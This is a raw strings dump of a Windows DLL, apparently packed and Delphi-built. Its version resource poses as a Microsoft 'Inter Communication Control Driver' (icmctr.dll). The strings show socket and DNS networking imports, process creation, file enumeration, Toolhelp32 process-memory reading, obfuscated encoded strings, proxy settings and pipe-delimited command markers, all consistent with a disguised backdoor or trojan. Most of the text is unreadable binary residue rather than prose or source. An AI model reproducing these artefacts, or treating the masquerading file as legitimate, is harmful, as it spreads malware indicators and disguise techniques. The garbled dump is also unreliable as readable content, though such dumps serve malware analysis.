MZP
This program must be run under Win32
^B*
CODE
DATA
BSS
.idata
.tls
.rdata
.reloc
.rsrc
.hello
.world
.pack
.SCY
Char
D$,
\$0
u:hD
SVWUQ
Z]_^[
SVWU
wb;
YZ]_^[
SVW
_^[
SVWU
]_^[
SVWU
;D$
w;;t$
;D$
+D$
]_^[
SVWU
;|$
]_^[
SVWUQ
Z]_^[
SVWU
3;{
YZ]_^[
SVWU
uW;{
u:;{
]_^[
SVW
_^[
ZYYd
ZYYd
SVW
_^[
SVWU
]_^[
SVW
_^[
SVW
_^[
YZ[
YZ^[
SVWU
g;s
g]_^[
SVW
UhT 
ZYYd
h[ 
_^[YY]
QSVW
gu,)
ZYYd
_^[Y]
SVWU
gu8
gug
g;D$
$;L$
$)D$
t!%
YZ]_^[
QSVW
ZYYd
_^[Y]
PRQ
YZXu
gYZ
gYZ
SVQ
Z^[
Ht Ht.
FHP
Huv
SHY
QSVW
uXj
#;u
_^[Y]
gjd
gje
r/f=
w)f%
SVW
@Gf
CHP
_^[
SVWR
GKu
_^[
SVW
tl1
-tb
+t_
$t_
xtZ
XtU
xtH
XtC
w%9
~KxI[)
2_^[
uM3
h .
ZYYd
gf%
SOFTWARE\Borland\Delphi\RTL
FPUMaskValue
jjj
PPRTj
PRQ
QTj
gYYZX
RTj
gZX
RQP
YZXtp
VWUd
SPRQ
T$(j
|$(
gSVWU
]_^[
D$0
]_^[
d$,1
,t\=
tW-
t\-
t=HtN
r6t0
t=-
t.Ht
Ht$
=t&
SVW
ZYYd
_^[]
SVW
Uhf3
ZYYd
_^[]
SVW
_^[
tWf
SVWU
]_^[
~$P
SVW
;_^[
t!R:
BBB
WPQ
SVW
_^[
t\;
SVW
_^[
SVWRP
Z_^[X
SVW
uXJt
uAJt
u:Jt
_^[
It2S
t&J|
SVW
N|*9
~")
_^[
t1SVW
_^t
_^[
SVW
;_^[
QRP
_^[
PSVW
t%<
t><
tQ<
t\<
tv<
_^[X
_^[X
SVWU
]_^[
]_^[
SVWU
]_^[
7Mu
]_^[
SVW
|"G
_^[
u'P
SVW
t93
ZYYd
_^[YY]
ZYYd
UhZB
ZYYd
haB
gu#
ZYYd
Pj@
u&d
ZYYd
ZYYd
ZYYd
ZYYd
SVW
<ar
<zw
BFK
_^[
SVWU
]_^[
SVWUQ
Z]_^[
-NA
<$f
,$f
0<:r
2Ju
 ^]
ZYYd
QQQQQSVW
ZYYd
_^[
jjj
SVW
FKu
ZYYd
_^[
jjj
SVW
FKu
ZYYd
_^[
SVW
COu
ZYYd
_^[
SVW
COu
ZYYd
_^[
ZYYd
ZYYd
UhmM
ZYYd
htM
[Y]
Dcmout4*//$
ZYYd
[Y]
S}au+Ocbhz>'Ka~njbe(2 4'.mkjvopndba<&CWNC.3)65$Po``hq}$IR.1)75$TP?-
UhmN
ZYYd
htN
[Y]
Gdmjvs4/,($
ZYYd
[Y]
Uuaz-Gcmnr>(Mi~alje'4(4((ekepgpabja3 KWAE&3&0=$_ih`gwu$FT&1&1=$[V7-
UhmO
ZYYd
htO
[Y]
Gaifjgznga>.Lmjt#Fdfrk
ZYYd
[Y]
Mojikcpnan>'Eeaw#Ahnxe
QQQQSV
ZYYd
SVW
_^[
SVW3
CNu
ZYYd
_^[
Uh-R
ZYYd
h4R
UhuR
ZYYd
h|R
ZYYd
Uh#T
gh\T
gh\T
h8U
ZYYd
h*T
.dhg
IA\'fp|w4+'
!gp`g`'
!mfck|&wft(OZPX(?*8
u0.J
f.dg
Gmgbvz)Kg`crgia=&kj*s}
Naws<.
V|e`ko>'ha)dgmlb
d.gh?
Gai|jjz*Djjis`5$>
Uh(W
ghDX
ZYYd
h/W
.0dg
0.fg
h.dg?
4fpjc62lbnl08sf|ba9]m}qk{4!pn{dk:; `kec1
<licy0:o40
2/l30<+ead}92/lscl:
^OWS.
!c|wgd+t{binz.to~?Wb}smh`I@:
HZRW/?(7
Haus:.
pf$h
fg.O
Amebpz+Ka`araic= kh*u}
Cahse`r*Twvb:.rbxz)otcj
Kajsjfz)Kjfipo5(
http=
socks=
SVW3
Uhu^
|v@
CNu
CNu
ZYYd
h|^
_^[
E106CC27E40BF322EE24C330E105F228D41DF604FA04E528C51AF610E618F322DC1DFC36E119E828DC35E33DE70FF329D71D8A00F61EF52EDC0ED9
E21BC52BEA2FEF26D005CF
E21BC52BEA39E435C40CD8
SV3
ZYYd
SVW3
ZYYd
_^[
QSV
ZYYd
^[Y]
H|B
ZYYd
Conn
QSVW
=L'
ZYYd
_^[
Content-Length: 
O.dh
3lklv0
J0.g
@aml0
200
Conn
QSVW
=L'
=L'
ZYYd
_^[
Content-Length: 
Content-Type:
s.mh
?lblz01`00
200
pq.z
<.f9>=!hoew4
Success
QSV
ZYYd
^[Y]
SV3
Uhym
gJt2Jt
t*jd
=jd
ZYYd
ZYYd
hHo
hXo
ghto
gh(p
gh8p
ghHp
ghXp
kernel32.dll
CreateToolhelp32Snapshot
Heap32ListFirst
Heap32ListNext
Heap32First
Heap32Next
Toolhelp32ReadProcessMemory
Process32First
Process32Next
Process32FirstW
Process32NextW
Thread32First
Thread32Next
Module32First
Module32Next
Module32FirstW
Module32NextW
g^[
g^[
g^[
ZYYd
h$s
h$s
h$s
0h$s
h$s
h$s
ZYYd
.dhg
f.dg
d.gh?
IA\'fp|w4+'
.0dg
!qqb|y*wfp;nj=
.L\S^+9)>
u0.J
Dcmout4*//$
Gmgbvz)Kg`crgia=&kj*s}
Naws<.
V|e`ko>'ha)dgmlb
S}au+Ocbhz>'Ka~njbe(2 4'.mkjvopndba<&CWNC.2)65$Po``hq}$IR.1)75$TP?-
Gaifjgznga>.Lmjt#Fdfrk
0h4v
hXv
hxv
hxv
hxv
0h4v
0hxv
hxv
hxv
hxv
hxv
ZYYd
.0dg
0.fg
h.dg?
^OWS.hps~:+(
'}aik&~lw0aj9
HZRW/?(7
fg.O
Gdmjvs4/,($
Amebpz+Ka`araic= kh*u}
Haus:.
X|e`bi4$i`%medgm
U}cu-Oabnz<'Ma|nlbg(4 6'(mijpornbbc< CUNE.0)05&Pi`bhw}&IT.3)15&TV?/
Kajsjfz)Kjfipo5(
Cahse`r*Twvb:.gwpbodazohn!idtkr*sztbac
Mojikcpnan>'Eeaw#Ahnxe
SVW3
Uhty
ZYYd
h{y
_^[
ERROR
/j2
ZYYd
\*.*
|0|
|1|
*.*
ERROR
|2|
5j2
ZYYd
|0|0|
|1|
L0d.
_ywzim$Ghla.\rkmisw
Ku/
/j2
ZYYd
|1|
|0|
jjjjjj
ZYYd
Uh/
ZYYd
SVW3
|9@
t.j
ZYYd
_^[
|2|0|
LOh.q
6/Ckd|"Ibhzj
|1|0|
|0|0|
QQQQQQQSV
Uhl
ZYYd
UNKOWN
x0.h
929&8.>&9
ZYYd
x$3V#7
QQQQQQS3
ZYYd
ZYYd
ghB
gpF
g M
g8R
gPR
ZYYd
gh 
Error
Runtime error     at 00000000
0123456789AB
yvz
962(25?*12:)?0=274
h2vph2v@Z2v Z2v@
\2v
U2v0
U2v 46v O2v
O2v
K2v@K2v
;2vP
g2v
{2v`
7v ]2v0R2v
7v0
`w`
pg2vPg2v Z2v
O2v
`w`
j2vp
7v`f2v
7v`
P2v
O2vpO2v
O2v
7v`M2v
7v@
7v0
E2v
D2v
t@D
t@^
t0]
t0S
kernel32.dll
DeleteCriticalSection
LeaveCriticalSection
EnterCriticalSection
InitializeCriticalSection
VirtualFree
VirtualAlloc
LocalFree
LocalAlloc
GetTickCount
QueryPerformanceCounter
GetVersion
GetCurrentThreadId
GetThreadLocale
GetStartupInfoA
GetLocaleInfoA
GetLastError
GetCommandLineA
FreeLibrary
ExitProcess
WriteFile
UnhandledExceptionFilter
SetFilePointer
SetEndOfFile
RtlUnwind
ReadFile
RaiseException
GetStdHandle
GetFileSize
GetFileType
CreateFileA
CloseHandle
user32.dll
GetKeyboardType
MessageBoxA
advapi32.dll
RegQueryValueExA
RegOpenKeyExA
RegCloseKey
oleaut32.dll
SysFreeString
SysReAllocStringLen
kernel32.dll
TlsSetValue
TlsGetValue
LocalAlloc
GetModuleHandleA
advapi32.dll
RegQueryValueExA
RegOpenKeyExA
RegCloseKey
kernel32.dll
lstrcmpiA
WaitForSingleObject
Sleep
SetFilePointer
ReadFile
GetProcAddress
GetModuleHandleA
GetModuleFileNameA
GetLastError
GetFileSize
GetFileAttributesA
GetCurrentDirectoryA
FindNextFileA
FindFirstFileA
FindClose
FileTimeToLocalFileTime
CreateThread
CreateProcessA
CreateFileA
CloseHandle
ws2_32.dll
WSAGetLastError
gethostname
gethostbyname
socket
setsockopt
send
recv
inet_ntoa
inet_addr
htons
connect
closesocket
WSACleanup
WSAStartup
dnsapi.dll
DnsRecordListFree
DnsQuery_A
0&0.060>0F0N0V0^0f0n0v0~0
0"1*121:1B1J1R1Z1c1
1C3
4O4b4
5]5
5K6
8%8/8E8K8Y8l8v8|8
9(929<9H9S9d9j9r9|9
:V:l:
:#<0<c<i<
<@=H=
=b>h>x>
?R?|?
0<0B0J0t0z0
1&1J1R1X1^1
1U2`2i2o2
3%3
4'4
5-5>5S5`5
5-6:6#7L7S7Z7*8?8r8
9!:y:
;d;
;6=u=
=5>J>^>f>|>
?/?_?
0.0{0
222T2
2'3:3N3
4 4*4O4Y4c4k4q4
5S9~;
02191K1i1r1~1
2M2o2{2
3)333Z3o3
4(484I4Z4f4k4p4w4~4
5"5*525:5B5J5R5Z5b5j5r5z5
6"6*626:6B6J6R6Z6b6j6w6
9B9
9%:z:
;N;
="=>=N=`=
=>>N>`>
>>?N?`?
080R0l0
041j1
2(2:2B2J2W2c2p2
3.333@3H3U3]3b3o3w3|3
4a5t5
5!6,696D6R6W6]6b6j6w6
819n9
:#:-:7:O:l:
;S;g;
;*<^<
<"=
>->6>F>S>z?
1G1
2<2]2x2
3(3Q3
3B4
4=5B5R5]5b5
5.6j6
6$787^7
7F8o8
8J9O9
9b:z:
:w;
;t<
<_=
>#>0>5>B>G>T>Y>f>k>x>}>
?,?7?
1*171D1T1a1h1m1w1|1
2&212>2I2V2o2-4@4M4Z4j4w4~4
5 5'525?5J5W5b5|5
8#888
9Z9
:I:O:T:x:~:
;Q;`;r;
<!<7<G<h<x<
<Q=r=
>k>~>
0"0'0\0
131C1d1t1
1.2
3*3:3z3
3)4[4
4V5|5
5$6:6V6[6k6q7
838
8:9h9x9
:;:N:g:w:
;);B;V;k;@<|<
=#=M=
?(?<?G?T?f?o?
0*0S0v0
1 1$1(1,1014181<1@1D1H1L1P1T1X1\1`1d1h1l1p1t1x1|1
4080<0
DVCLAL
PACKAGEINFO
&=O8
ialmrnt4
TlHelp32
System
SysInit
KWindows
UTypes
?WinInet
gDNS
Wsk2
log
Conn
SysU
Mix
crd
~cmds
VS_VERSION_INFO
StringFileInfo
040904B0
CompanyName
Microsoft Corporation
FileDescription
Inter Communication Control Driver8
FileVersion
6.14.11.44024
InternalName
icmctr.dll
LegalCopyright
(C) Microsoft Corporation. All rights reserved.
OriginalFilename
icmctr.dll
ProductName
Inter Communication Control Driver for Windows NT(R)<
ProductVersion
6.14.11.4402D
VarFileInfo
Translation
,9v
zYs
#zG
}>D;
DRq
NT_
(Ww
!An
lpHP
AOg
V>K
_`Q
cU!
gUVSW
WPV
g_[^]
SVW
8MZt
p<f
PEt
_^[
tiS
_^[]
_^2
tjS
yH%
tMSV
_^[
VW3
SUVW
_^][
SUVW
$Pj
,Rj
_^][
Y2v
P2v
GetProcAddress
LoadLibraryA
kernel32.dll
H4Packer-DLL.dll
3+3D3^3{3
kernel32.dll
DeleteCriticalSection
LeaveCriticalSection
EnterCriticalSection
InitializeCriticalSection
VirtualFree
VirtualAlloc
LocalFree
LocalAlloc
GetTickCount
QueryPerformanceCounter
GetVersion
GetCurrentThreadId
GetThreadLocale
GetStartupInfoA
GetLocaleInfoA
GetLastError
GetCommandLineA
FreeLibrary
ExitProcess
WriteFile
UnhandledExceptionFilter
SetFilePointer
SetEndOfFile
RtlUnwind
ReadFile
RaiseException
GetStdHandle
GetFileSize
GetFileType
CreateFileA
CloseHandle
user32.dll
GetKeyboardType
MessageBoxA
advapi32.dll
RegQueryValueExA
RegOpenKeyExA
RegCloseKey
oleaut32.dll
SysFreeString
SysReAllocStringLen
kernel32.dll
TlsSetValue
TlsGetValue
LocalAlloc
GetModuleHandleA
advapi32.dll
RegQueryValueExA
RegOpenKeyExA
RegCloseKey
kernel32.dll
lstrcmpiA
WaitForSingleObject
Sleep
SetFilePointer
ReadFile
GetProcAddress
GetModuleHandleA
GetModuleFileNameA
GetLastError
GetFileSize
GetFileAttributesA
GetCurrentDirectoryA
FindNextFileA
FindFirstFileA
FindClose
FileTimeToLocalFileTime
CreateThread
CreateProcessA
CreateFileA
CloseHandle
ws2_32.dll
WSAGetLastError
gethostname
gethostbyname
socket
setsockopt
send
recv
inet_ntoa
inet_addr
htons
connect
closesocket
WSACleanup
WSAStartup
dnsapi.dll
DnsRecordListFree
DnsQuery_A
